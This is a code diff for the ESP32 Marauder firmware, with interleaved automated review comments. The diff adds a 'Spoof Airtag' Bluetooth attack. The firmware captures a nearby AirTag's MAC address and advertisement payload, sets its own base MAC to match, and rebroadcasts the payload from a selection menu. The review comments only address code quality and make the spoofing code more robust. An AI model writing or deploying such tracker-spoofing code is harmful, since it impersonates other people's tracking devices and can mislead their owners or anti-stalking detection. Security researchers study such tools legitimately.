diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
index 9beb18d..c610d4a 100644
--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -592,6 +592,7 @@ void MenuFunctions::main(uint32_t currentTime)
 (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
 (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
 (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+ (wifi_scan_obj.currentScanMode == BT_SPOOF_AIRTAG) ||
 (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
 (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
 (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -658,6 +659,7 @@ void MenuFunctions::main(uint32_t currentTime)
 (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
 (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
 (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+ (wifi_scan_obj.currentScanMode == BT_SPOOF_AIRTAG) ||
 (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
 (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
 (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1227,6 +1229,7 @@ void MenuFunctions::RunSetup()
 {
 extern LinkedList* access_points;
 extern LinkedList* stations;
+ extern LinkedList* airtags;
 this->disable_touch = false;
@@ -1265,6 +1268,9 @@ void MenuFunctions::RunSetup()
 #endif
 wifiGeneralMenu.list = new LinkedList();
 wifiAPMenu.list = new LinkedList();
+ #ifdef HAS_BT
+ airtagMenu.list = new LinkedList();
+ #endif
 #ifndef HAS_ILI9341
 wifiStationMenu.list = new LinkedList();
 #endif
@@ -1323,6 +1329,9 @@ void MenuFunctions::RunSetup()
 clearSSIDsMenu.name = text_table1[28];
 clearAPsMenu.name = text_table1[29];
 wifiAPMenu.name = "Access Points";
+ #ifdef HAS_BT
+ airtagMenu.name = "Select Airtag";
+ #endif
 #ifndef HAS_ILI9341
 wifiStationMenu.name = "Select Stations";
 #endif
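Review bot: The `BT_SPOOF_AIRTAG` comparison is added by hand to a mode list that this commit has to extend in five places: here and at -658 in MenuFunctions::main, and in WiFiScan::StartScan, WiFiScan::StopScan and WiFiScan::main. Missing one of them would leave the mode running without its matching stop or redraw path, so one or two named predicates declared next to the `BT_*` defines, for example `bool isBtTransmitMode(uint8_t mode)`, would be easier to keep correct than repeated `||` chains. The enclosing `if` starts and ends outside this hunk, so the full condition cannot be checked from here.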
@@ -1663,6 +1672,7 @@ void MenuFunctions::RunSetup() this->changeMenu(wifiAPMenu.parentMenu); }); + // Select Stations on Mini v1 /* this->addNodes(&wifiGeneralMenu, "Select Stations", TFT_CYAN, NULL, KEYBOARD_ICO, [this](){ @@ -1914,6 +1924,59 @@ void MenuFunctions::RunSetup() wifi_scan_obj.StartScan(BT_ATTACK_SPAM_ALL, TFT_MAGENTA); }); + #ifndef HAS_ILI9341 + // Select Airtag on Mini + this->addNodes(&bluetoothAttackMenu, "Spoof Airtag", TFT_WHITE, NULL, ATTACKS, [this](){ + // Clear nodes and add back button + airtagMenu.list->clear(); + this->addNodes(&airtagMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() { + this->changeMenu(airtagMenu.parentMenu); + }); + + // Add buttons for all airtags + // Find out how big our menu is going to be + int menu_limit; + if (airtags->size() <= BUTTON_ARRAY_LEN) + menu_limit = airtags->size(); + else + menu_limit = BUTTON_ARRAY_LEN; + + Serial.println("Found " + (String)airtags->size() + " airtag(s)"); + + // Create the menu nodes for all of the list items + for (int i = 0; i < menu_limit; i++) { + this->addNodes(&airtagMenu, airtags->get(i).mac, TFT_WHITE, NULL, BLUETOOTH, [this, i](){ + AirTag new_at = airtags->get(i); + new_at.selected = true; + + airtags->set(i, new_at); + + // Set all other airtags to "Not Selected" + for (int x = 0; x < airtags->size(); x++) { + if (x != i) { + AirTag new_atx = airtags->get(x); + new_atx.selected = false; + airtags->set(x, new_atx); + } + } + + // Start the spoof + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(BT_SPOOF_AIRTAG, TFT_WHITE); + + }); + } + this->changeMenu(&airtagMenu); + }); + + airtagMenu.parentMenu = &bluetoothAttackMenu; + this->addNodes(&airtagMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() { + this->changeMenu(airtagMenu.parentMenu); + }); + + #endif + // Device menu deviceMenu.parentMenu = &mainMenu; this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() { 
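Review bot: The `Spoof Airtag` block at -1914 is guarded only by `#ifndef HAS_ILI9341`, while `airtagMenu` is declared in MenuFunctions.h and allocated and named in RunSetup under `#ifdef HAS_BT`. A build with neither macro defined would therefore reference an undeclared member, unless an enclosing `HAS_BT` region exists outside this hunk. Using `#if defined(HAS_BT) && !defined(HAS_ILI9341)` here and on the declaration, allocation and name keeps the four sites consistent. A short comment above the selection loop stating that exactly one entry is left with `selected == true`, and that at most `BUTTON_ARRAY_LEN` entries are listed, would also help the next reader.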
diff --git a/esp32_marauder/MenuFunctions.h b/esp32_marauder/MenuFunctions.h
index 8b016ca..6f6ea8e 100644
--- a/esp32_marauder/MenuFunctions.h
+++ b/esp32_marauder/MenuFunctions.h
@@ -151,6 +151,9 @@ class MenuFunctions
 #endif
 Menu wifiGeneralMenu;
 Menu wifiAPMenu;
+ #ifdef HAS_BT
+ Menu airtagMenu;
+ #endif
 #ifndef HAS_ILI9341
 Menu wifiStationMenu;
 #endif
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index 1890681..56a34a0 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -176,6 +176,18 @@ extern "C" {
 break;
 }
+
+ case Airtag: {
+ for (int i = 0; i < airtags->size(); i++) {
+ if (airtags->get(i).selected) {
+ AdvData.addData(std::string((char*)airtags->get(i).payload.data(), airtags->get(i).payloadSize));
+
+ break;
+ }
+ }
+
+ break;
+ }
 default: {
 Serial.println("Please Provide a Company Type");
 break;
@@ -244,6 +256,7 @@ extern "C" {
 AirTag airtag;
 airtag.mac = mac;
 airtag.payload.assign(payLoad, payLoad + len);
+ airtag.payloadSize = len;
 airtags->add(airtag);
@@ -697,7 +710,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
 (scan_mode == BT_ATTACK_SPAM_ALL) ||
 (scan_mode == BT_ATTACK_SAMSUNG_SPAM) ||
 (scan_mode == BT_ATTACK_GOOGLE_SPAM) ||
- (scan_mode == BT_ATTACK_FLIPPER_SPAM)) {
+ (scan_mode == BT_ATTACK_FLIPPER_SPAM) ||
+ (scan_mode == BT_SPOOF_AIRTAG)) {
 #ifdef HAS_BT
 RunSwiftpairSpam(scan_mode, color);
 #endif
@@ -885,6 +899,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
 (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
 (currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
 (currentScanMode == BT_ATTACK_FLIPPER_SPAM) ||
+ (currentScanMode == BT_SPOOF_AIRTAG) ||
 (currentScanMode == BT_SCAN_WAR_DRIVE) ||
 (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
 (currentScanMode == BT_SCAN_SKIMMERS))
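Review bot: In the `case Airtag` branch the byte pointer comes from `payload.data()` but the length comes from the separate `payloadSize` field, each read through its own `airtags->get(i)` call. If the two ever disagree the `std::string` constructor reads past the vector's storage, and the bytes originate from a received advertisement, so the length is not under the firmware's control. Taking one copy and using the vector's own size removes that dependency: `const AirTag tag = airtags->get(i);` followed by `AdvData.addData(std::string(reinterpret_cast<const char*>(tag.payload.data()), tag.payload.size()));`. With that change `payloadSize` in `struct AirTag` is redundant. The enclosing switch starts outside the hunk.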
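Review bot: `selected` is never assigned on the `AirTag` built in the -244 hunk: the visible lines set `mac`, `payload` and now `payloadSize` before `airtags->add(airtag)`, and `struct AirTag` in WiFiScan.h declares `bool selected;` without an initializer. The new code in `case Airtag` and `executeSpoofAirtag()` reads that flag, so an entry the user never chose can be treated as selected. Add `airtag.selected = false;` before the `add`, or give the member a default with `bool selected = false;`. The surrounding callback starts outside the hunk.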
@@ -2051,7 +2066,7 @@ void WiFiScan::setBaseMacAddress(uint8_t macAddr[6]) {
 // Check for success or handle errors
 if (err == ESP_OK) {
- Serial.println("Base MAC address successfully set.");
+ return;
 } else if (err == ESP_ERR_INVALID_ARG) {
 Serial.println("Error: Invalid MAC address argument.");
 } else {
@@ -2059,6 +2074,46 @@ void WiFiScan::setBaseMacAddress(uint8_t macAddr[6]) {
 }
 }
+void WiFiScan::executeSpoofAirtag() {
+ #ifdef HAS_BT
+ for (int i = 0; i < airtags->size(); i++) {
+ if (airtags->get(i).selected) {
+
+ uint8_t macAddr[6];
+
+ convertMacStringToUint8(airtags->get(i).mac, macAddr);
+
+ //macAddr[0] = 0x02;
+
+ macAddr[5] -= 2;
+
+ Serial.println("Using MAC: " + macToString(macAddr));
+
+ // Do this because ESP32 BT addr is Base MAC + 2
+
+ this->setBaseMacAddress(macAddr);
+
+ NimBLEDevice::init("");
+
+ NimBLEServer *pServer = NimBLEDevice::createServer();
+
+ pAdvertising = pServer->getAdvertising();
+
+ //NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+ NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Airtag);
+ pAdvertising->setAdvertisementData(advertisementData);
+ pAdvertising->start();
+ delay(10);
+ pAdvertising->stop();
+
+ NimBLEDevice::deinit();
+
+ break;
+ }
+ }
+ #endif
+}
+
 void WiFiScan::executeSwiftpairSpam(EBLEPayloadType type) {
 #ifdef HAS_BT
 uint8_t macAddr[6];
@@ -2473,6 +2528,8 @@ void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) {
 display_obj.tft.drawCentreString("BLE Spam Google",120,16,2);
 else if (scan_mode == BT_ATTACK_FLIPPER_SPAM)
 display_obj.tft.drawCentreString("BLE Spam Flipper", 120, 16, 2);
+ else if (scan_mode == BT_SPOOF_AIRTAG)
+ display_obj.tft.drawCentreString("BLE Spoof Airtag", 120, 16, 2);
 display_obj.touchToExit();
 #endif
 display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
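Review bot: `macAddr` in `executeSpoofAirtag()` is declared without an initializer and then changed with `macAddr[5] -= 2` whether or not `convertMacStringToUint8` filled it. The utils.h context shows that helper testing `macStr.length() != 17`, which suggests it can return without writing the array. A failure in `setBaseMacAddress` is equally invisible here, because it returns `void` and only prints, so `NimBLEDevice::init("")` runs even when the address was rejected. Declare `uint8_t macAddr[6] = {};`, have both helpers report success (for example by returning `bool`), and leave the loop before `NimBLEDevice::init("")` on failure. Nothing in this function restores the previous base MAC, so a comment saying that the change outlives the call would document the side effect for later Wi-Fi and BLE code.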
@@ -4922,7 +4979,8 @@ void WiFiScan::main(uint32_t currentTime) (currentScanMode == BT_ATTACK_SPAM_ALL) || (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || - (currentScanMode == BT_ATTACK_FLIPPER_SPAM)) { + (currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (currentScanMode == BT_SPOOF_AIRTAG)) { #ifdef HAS_BT if (currentTime - initTime >= 1000) { initTime = millis(); @@ -4958,6 +5016,10 @@ void WiFiScan::main(uint32_t currentTime) if ((currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (currentScanMode == BT_ATTACK_SPAM_ALL)) this->executeSwiftpairSpam(FlipperZero); + + if (currentScanMode == BT_SPOOF_AIRTAG) + this->executeSpoofAirtag(); + #endif } else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) { diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index 0ecf752..f9b857f 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -96,6 +96,7 @@ #define BT_ATTACK_GOOGLE_SPAM 41 #define BT_ATTACK_FLIPPER_SPAM 42 #define BT_SCAN_AIRTAG 43 +#define BT_SPOOF_AIRTAG 44 #define GRAPH_REFRESH 100 @@ -159,6 +160,7 @@ struct Station { struct AirTag { String mac; // MAC address of the AirTag std::vector payload; // Payload data + uint16_t payloadSize; bool selected; }; @@ -273,7 +275,8 @@ class WiFiScan Apple, Samsung, Google, - FlipperZero + FlipperZero, + Airtag }; #ifdef HAS_BT @@ -302,6 +305,7 @@ class WiFiScan void clearMacHistory(); void executeWarDrive(); void executeSourApple(); + void executeSpoofAirtag(); void executeSwiftpairSpam(EBLEPayloadType type); void startWardriverWiFi(); //void generateRandomMac(uint8_t* mac); diff --git a/esp32_marauder/utils.h b/esp32_marauder/utils.h index b435d12..a9e6ad6 100644 --- a/esp32_marauder/utils.h +++ b/esp32_marauder/utils.h 
@@ -55,6 +55,14 @@ String macToString(const Station& station) {
 return String(macStr);
 }
+String macToString(uint8_t macAddr[6]) {
+ char macStr[18]; // 17 characters for "XX:XX:XX:XX:XX:XX" + 1 null terminator
+ snprintf(macStr, sizeof(macStr), "%02X:%02X:%02X:%02X:%02X:%02X",
+ macAddr[0], macAddr[1], macAddr[2],
+ macAddr[3], macAddr[4], macAddr[5]);
+ return String(macStr);
+}
+
 void convertMacStringToUint8(const String& macStr, uint8_t macAddr[6]) {
 // Ensure the input string is in the format "XX:XX:XX:XX:XX:XX"
 if (macStr.length() != 17) {
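Review bot: The new overload takes `uint8_t macAddr[6]` although it only reads the bytes; declaring it as `String macToString(const uint8_t macAddr[6])` documents that nothing is written and lets callers pass read-only buffers. The `[6]` in the parameter is not enforced by the compiler, so a one-line comment above the function saying that the caller must supply at least six bytes is worth adding. Like the neighbouring `macToString(const Station&)`, it is defined in a header without `inline`, which may produce duplicate-definition link errors if utils.h is included from more than one source file.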